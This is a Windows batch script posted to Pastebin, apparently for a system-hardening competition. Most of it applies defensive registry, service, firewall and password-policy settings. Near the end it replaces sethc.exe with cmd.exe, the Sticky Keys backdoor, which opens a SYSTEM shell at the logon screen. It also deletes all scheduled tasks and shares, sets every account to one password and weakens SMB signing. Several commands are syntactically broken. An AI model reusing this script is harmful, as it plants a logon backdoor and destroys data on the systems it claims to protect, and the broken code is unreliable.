Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- color 0f
- cls
- :admnchk
- echo Immediately checking for Administrative access
- net sessions
- if %errorlevel%==0 (
- echo Yay you have Admin u no how2windows GG
- goto :adminhop
- ) else (
- echo Lol u r bad
- echo N0 Adm1n n00b!
- pause
- exit
- )
- :adminhop
- REM Turns on UAC
- reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
- REM Turns off RDP
- reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
- reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- REM Failsafe
- if %errorlevel%==1 netsh advfirewall firewall set service type = remotedesktop mode = disable
- REM Windows auomatic updates
- reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v AUOptions /t REG_DWORD /d 3 /f
- echo Cleaning out the DNS cache...
- ipconfig /flushdns
- echo Writing over the hosts file...
- attrib -r -s C:\WINDOWS\system32\drivers\etc\hosts
- echo > C:\Windows\System32\drivers\etc\hosts
- if %errorlevel%==1 echo There was an error in writing to the hosts file (not running this as Admin probably)
- REM Services
- echo Showing you the services...
- net start
- echo Now writing services to a file and searching for vulnerable services...
- net start > servicesstarted.txt
- echo This is only common services, not nessecarily going to catch 100%
- REM looks to see if remote registry is on
- net start | findstr Remote Registry
- if %errorlevel%==0 (
- echo Remote Registry is running!
- echo Attempting to stop...
- net stop RemoteRegistry
- sc config RemoteRegistry start=disabled
- if %errorlevel%==1 echo Stop failed... sorry...
- ) else (
- echo Remote Registry is already indicating stopped.
- )
- REM Remove all saved credentials
- cmdkey.exe /list > "%TEMP%\List.txt"
- findstr.exe Target "%TEMP%\List.txt" > "%TEMP%\tokensonly.txt"
- FOR /F "tokens=1,2 delims= " %%G IN (%TEMP%\tokensonly.txt) DO cmdkey.exe /delete:%%H
- del "%TEMP%\*.*" /s /f /q
- REM looks to see if remote access is on
- set SRVC_LIST=(RemoteAccess Telephony tlntsvr p2pimsvc simptcp fax msftpsvc)
- for %%i in %HITHERE% do net stop %%i
- for %%i in %HITHERE% sc config %%i start= disabled
- REM Rouge User Portion deleted.... disabling code because it's lame as hell....
- REM net users
- REM echo Would you like to delete a username?
- REM set /p ynuser=Y or N?
- REM if %ynuser%==Y (
- REM set /p deluser=Enter a user to delete:
- REM if %deluser%=="CYBERNEXS" echo DO NOT DELETE CYBERNEXS. IT WILL DISCONNNECT TO SAIC.
- REM if %deluser%=="CYBERNEXS" goto :deletion
- REM net user %deluser% /delete
- REM if %errorlevel%==0 echo Deletion succcessful.
- REM goto :deletion
- REM ) else (
- REM echo K. Moving on.
- REM )
- REM Guest Account is deactivating
- net user Guest | findstr Active | findstr Yes
- if %errorlevel%==0 echo Guest account is active, deactivating
- if %errorlevel%==1 echo Guest account is not active, checking default admin account
- net user Guest /active:NO
- REM Rename Guest Account
- wmic useraccount where name='Guest' rename baconsweggur
- REM Make sure you are not on the administrator account before you deactive administrator account
- echo Making sure you are not on the default admin account...
- net user | findstr Administrator
- if %errorlevel%==0 (
- echo "Administrator" account exists
- echo Looking to see if you are on it
- if "%username%"=="Administrator" (
- echo Awkward, you ARE the Administrator account
- goto :skipcode
- )
- net user Administrator /active:NO
- )
- :skipcode
- set /p newpwd=Enter a new password for your accounts:
- net users > userlist.txt
- (
- for /F %%h in (userlist.txt) do (
- echo %%h | findstr NEXS
- if %errorlevel%==1 net user %%h %newpwd% >> userlist.txt
- )
- )
- REM Now on to the firewall. Disables common rules.
- netsh advfirewall firewall set rule name="Remote Assistance (DCOM-In)" new enable=no >NUL
- netsh advfirewall firewall set rule name="Remote Assistance (PNRP-In)" new enable=no >NUL
- netsh advfirewall firewall set rule name="Remote Assistance (RA Server TCP-In)" new enable=no >NUL
- netsh advfirewall firewall set rule name="Remote Assistance (SSDP TCP-In)" new enable=no >NUL
- netsh advfirewall firewall set rule name="Remote Assistance (SSDP UDP-In)" new enable=no >NUL
- netsh advfirewall firewall set rule name="Remote Assistance (TCP-In)" new enable=no >NUL
- netsh advfirewall firewall set rule name="Telnet Server" new enable=no >NUL
- netsh advfirewall firewall set rule name="netcat" new enable=no >NUL
- REM Disabling Windows Features
- REM Assuming they are on, if they aren't then boo-who
- dism /online /disable-feature /featurename:IIS-WebServerRole >NUL
- dism /online /disable-feature /featurename:IIS-WebServer >NUL
- dism /online /disable-feature /featurename:IIS-CommonHttpFeatures >NUL
- dism /online /disable-feature /featurename:IIS-HttpErrors >NUL
- dism /online /disable-feature /featurename:IIS-HttpRedirect >NUL
- dism /online /disable-feature /featurename:IIS-ApplicationDevelopment >NUL
- dism /online /disable-feature /featurename:IIS-NetFxExtensibility >NUL
- dism /online /disable-feature /featurename:IIS-NetFxExtensibility45 >NUL
- dism /online /disable-feature /featurename:IIS-HealthAndDiagnostics >NUL
- dism /online /disable-feature /featurename:IIS-HttpLogging >NUL
- dism /online /disable-feature /featurename:IIS-LoggingLibraries >NUL
- dism /online /disable-feature /featurename:IIS-RequestMonitor >NUL
- dism /online /disable-feature /featurename:IIS-HttpTracing >NUL
- dism /online /disable-feature /featurename:IIS-Security >NUL
- dism /online /disable-feature /featurename:IIS-URLAuthorization >NUL
- dism /online /disable-feature /featurename:IIS-RequestFiltering >NUL
- dism /online /disable-feature /featurename:IIS-IPSecurity >NUL
- dism /online /disable-feature /featurename:IIS-Performance >NUL
- dism /online /disable-feature /featurename:IIS-HttpCompressionDynamic >NUL
- dism /online /disable-feature /featurename:IIS-WebServerManagementTools >NUL
- dism /online /disable-feature /featurename:IIS-ManagementScriptingTools >NUL
- dism /online /disable-feature /featurename:IIS-IIS6ManagementCompatibility >NUL
- dism /online /disable-feature /featurename:IIS-Metabase >NUL
- dism /online /disable-feature /featurename:IIS-HostableWebCore >NUL
- dism /online /disable-feature /featurename:IIS-StaticContent >NUL
- dism /online /disable-feature /featurename:IIS-DefaultDocument >NUL
- dism /online /disable-feature /featurename:IIS-DirectoryBrowsing >NUL
- dism /online /disable-feature /featurename:IIS-WebDAV >NUL
- dism /online /disable-feature /featurename:IIS-WebSockets >NUL
- dism /online /disable-feature /featurename:IIS-ApplicationInit >NUL
- dism /online /disable-feature /featurename:IIS-ASPNET >NUL
- dism /online /disable-feature /featurename:IIS-ASPNET45 >NUL
- dism /online /disable-feature /featurename:IIS-ASP >NUL
- dism /online /disable-feature /featurename:IIS-CGI >NUL
- dism /online /disable-feature /featurename:IIS-ISAPIExtensions >NUL
- dism /online /disable-feature /featurename:IIS-ISAPIFilter >NUL
- dism /online /disable-feature /featurename:IIS-ServerSideIncludes >NUL
- dism /online /disable-feature /featurename:IIS-CustomLogging >NUL
- dism /online /disable-feature /featurename:IIS-BasicAuthentication >NUL
- dism /online /disable-feature /featurename:IIS-HttpCompressionStatic >NUL
- dism /online /disable-feature /featurename:IIS-ManagementConsole >NUL
- dism /online /disable-feature /featurename:IIS-ManagementService >NUL
- dism /online /disable-feature /featurename:IIS-WMICompatibility >NUL
- dism /online /disable-feature /featurename:IIS-LegacyScripts >NUL
- dism /online /disable-feature /featurename:IIS-LegacySnapIn >NUL
- dism /online /disable-feature /featurename:IIS-FTPServer >NUL
- dism /online /disable-feature /featurename:IIS-FTPSvc >NUL
- dism /online /disable-feature /featurename:IIS-FTPExtensibility >NUL
- dism /online /disable-feature /featurename:TFTP >NUL
- dism /online /disable-feature /featurename:TelnetClient >NUL
- dism /online /disable-feature /featurename:TelnetServer >NUL
- REM now on to the power settings
- REM use commands as vague as possible to set a require password on wakeup
- REM assumes its a laptop, which is silly
- powercfg -SETDCVALUEINDEX SCHEME_BALANCED SUB_NONE CONSOLELOCK 1
- powercfg -SETACVALUEINDEX SCHEME_BALANCED SUB_NONE CONSOLELOCK 1
- powercfg -SETDCVALUEINDEX SCHEME_MIN SUB_NONE CONSOLELOCK 1
- powercfg -SETDCVALUEINDEX SCHEME_MIN SUB_NONE CONSOLELOCK 1
- powercfg -SETDCVALUEINDEX SCHEME_MAX SUB_NONE CONSOLELOCK 1
- powercfg -SETDCVALUEINDEX SCHEME_MAX SUB_NONE CONSOLELOCK 1
- REM Automatically delete all network shares that are 1 word or less cause I have no system for
- net share > sharelist.txt
- (
- for /F %%h in (sharelist.txt) do (
- net share /delete %%h >> deletedsharelist.txt
- )
- )
- pause
- REM Common Policies
- REM Restrict CD ROM drive
- reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateCDRoms /t REG_DWORD /d 1 /f
- REM Automatic Admin logon
- reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 0 /f
- REM Logo message text
- reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "Lol noobz pl0x don't hax, thx bae"
- REM Logon message title bar
- reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "Dnt hax me"
- REM Wipe page file from shutdown
- reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v ClearPageFileAtShutdown /t REG_DWORD /d 1 /f
- REM LOL this is a key? Disallow remote access to floppie disks
- reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateFloppies /t REG_DWORD /d 1 /f
- REM Prevent print driver installs
- reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers" /v AddPrinterDrivers /t REG_DWORD /d 1 /f
- REM Limit local account use of blank passwords to console
- reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 1 /f
- REM Auditing access of Global System Objects
- reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v auditbaseobjects /t REG_DWORD /d 1 /f
- REM Auditing Backup and Restore
- reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v fullprivilegeauditing /t REG_DWORD /d 1 /f
- REM Do not display last user on logon
- reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 1 /f
- REM UAC setting (Prompt on Secure Desktop)
- reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t REG_DWORD /d 1 /f
- REM Enable Installer Detection
- reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 1 /f
- REM Undock without logon
- reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v undockwithoutlogon /t REG_DWORD /d 0 /f
- REM Maximum Machine Password Age
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v MaximumPasswordAge /t REG_DWORD /d 15 /f
- REM Disable machine account password changes
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v DisablePasswordChange /t REG_DWORD /d 1 /f
- REM Require Strong Session Key
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireStrongKey /t REG_DWORD /d 1 /f
- REM Require Sign/Seal
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireSignOrSeal /t REG_DWORD /d 1 /f
- REM Sign Channel
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SignSecureChannel /t REG_DWORD /d 1 /f
- REM Seal Channel
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SealSecureChannel /t REG_DWORD /d 1 /f
- REM Don't disable CTRL+ALT+DEL even though it serves no purpose
- reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCAD /t REG_DWORD /d 0 /f
- REM Restrict Anonymous Enumeration #1
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_DWORD /d 1 /f
- REM Restrict Anonymous Enumeration #2
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymoussam /t REG_DWORD /d 1 /f
- REM Idle Time Limit - 45 mins
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v autodisconnect /t REG_DWORD /d 45 /f
- REM Require Security Signature - Disabled pursuant to checklist
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v enablesecuritysignature /t REG_DWORD /d 0 /f
- REM Enable Security Signature - Disabled pursuant to checklist
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v requiresecuritysignature /t REG_DWORD /d 0 /f
- REM Disable Domain Credential Storage
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v disabledomaincreds /t REG_DWORD /d 1 /f
- REM Don't Give Anons Everyone Permissions
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v everyoneincludesanonymous /t REG_DWORD /d 0 /f
- REM SMB Passwords unencrypted to third party? How bout nah
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanWorkstation\Parameters /v EnablePlainTextPassword /t REG_DWORD /d 0 /f
- REM Null Session Pipes Cleared
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionPipes /t REG_MULTI_SZ /d "" /f
- REM Remotely accessible registry paths cleared
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedExactPaths /v Machine /t REG_MULTI_SZ /d "" /f
- REM Remotely accessible registry paths and sub-paths cleared
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths /v Machine /t REG_MULTI_SZ /d "" /f
- REM Restict anonymous access to named pipes and shares
- reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionShares /t REG_MULTI_SZ /d "" /f
- REM Allow to use Machine ID for NTLM
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v UseMachineId /t REG_DWORD /d 0 /f
- REM Internet Explorer
- REM Smart Screen for IE8
- reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV8 /t REG_DWORD /d 1 /f
- REM Smart Screen for IE9+
- reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1 /f
- REM Windows Explorer Settings
- reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
- reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 1 /f
- REM Disable Dump file creation
- reg ADD HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /v CrashDumpEnabled /t REG_DWORD /d 0 /f
- REM Disable Autorun
- reg ADD HKCU\SYSTEM\CurrentControlSet\Services\CDROM /v AutoRun /t REG_DWORD /d 1 /f
- REM Disabled Internet Explorer Password Caching
- reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisablePasswordCaching /t REG_DWORD /d 1 /f
- REM Internet Explorer Settings
- REM Enable Do Not Track
- reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DoNotTrack /t REG_DWORD /d 1 /f
- reg ADD "HKCU\Software\Microsoft\Internet Explorer\Download" /v RunInvalidSignatures /t REG_DWORD /d 1 /f
- reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings" /v LOCALMACHINE_CD_UNLOCK /t REG_DWORD /d 1 /t
- reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonBadCertRecving /t REG_DWORD /d /1 /f
- reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnOnPostRedirect /t REG_DWORD /d 1 /f
- reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonZoneCrossing /t REG_DWORD /d 1 /f
- REM account password policy set
- echo New requirements are being set for your passwords
- net accounts /FORCELOGOFF:30 /MINPWLEN:8 /MAXPWAGE:30 /MINPWAGE:10 /UNIQUEPW:3
- echo New password policy:
- echo Force log off after 30 minutes
- echo Minimum password length of 8 characters
- echo Maximum password age of 30
- echo Minimum password age of 10
- echo Unique password threshold set to 3 (default is 5)
- pause
- REM Delete system tasks
- schtasks /Delete /TN *
- REM Integrated Stick Keys
- REM Give permissions needed
- takeown /f cmd.exe >NUL
- takeown /f sethc.exe >NUL
- icacls cmd.exe /grant %username%:F >NUL
- icacls sethc.exe /grant %username%:F >NUL
- REM Renaming and stuff
- move sethc.exe sethc.old.exe
- copy cmd.exe sethc.exe
- echo Stick Keys exploit triggered
- REM Saved Credentials
- REM Auditing Policy
- auditpol /set /category:* /success:enable
- auditpol /set /category:* /failure:enable
- REM system verification
- sfc /verifyonly
- pause
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement